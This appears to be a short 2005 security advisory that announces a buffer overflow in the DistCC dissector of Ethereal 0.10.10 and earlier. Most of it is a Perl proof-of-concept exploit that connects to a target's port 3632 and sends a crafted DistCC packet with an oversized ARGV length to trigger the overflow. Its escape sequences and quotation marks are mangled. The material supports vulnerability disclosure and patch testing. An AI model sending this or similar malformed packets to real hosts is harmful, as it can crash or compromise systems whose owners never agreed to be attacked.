‘Ethereal DistCC Buffer Overflow (Exploit)’
Summary
‘As we reported in our previous article: Ethereal DistCC Dissector Overflow,
Credit:
‘The information has been provided by beSTORM.’
Details
‘Vulnerable Systems:
* Ethereal version 0.10.10 and prior
Immune Systems:
* Ethereal version 0.10.11 or newer
Exploit:
#!/usr/bin/perl -w
# Exploit generated by beSTORM on 2005-05-10 12:45
# All Rights Reserved – Copyright ™
use IO::Socket;
use strict;
my $target = shift;
my $print_usage = 0;
if (!$target)
{
usage();
print ‘No target has been supplied, reverting to 192.168.1.52.n’;
$target = ‘192.168.1.52’;
}
print ‘Will attack $target.n’;
my $target_port = 3632;
my $packet =<<END;
DIST00000001ARGC00000008ARGVFFFFFF00ccARGV00000002-gARGV00000003-O2ARGV00000005-WallARGV00000002-cARGV00000006main.cARGV00000002-oARGV00000006main.oDOTI0000001Bint main()n{n return(0);n}n
END
print ‘Sending: [$packet]n’;
my $remote = IO::Socket::INET->new ( Proto => ‘tcp’, PeerAddr => $target, PeerPort => ‘3632’);
unless ($remote) { die ‘cannot connect to distcc daemon on $target’ }
print $remote $packet;
print ‘Done.n’;
sub usage
{
if ($print_usage) { return; }
$print_usage = 1;
print (‘#’x50);
print ‘n’;
print ‘# $0 [hostname]n’;
print ‘# hostnamet-tThe host the packet will be sent to.n’;
print ‘n’;
}’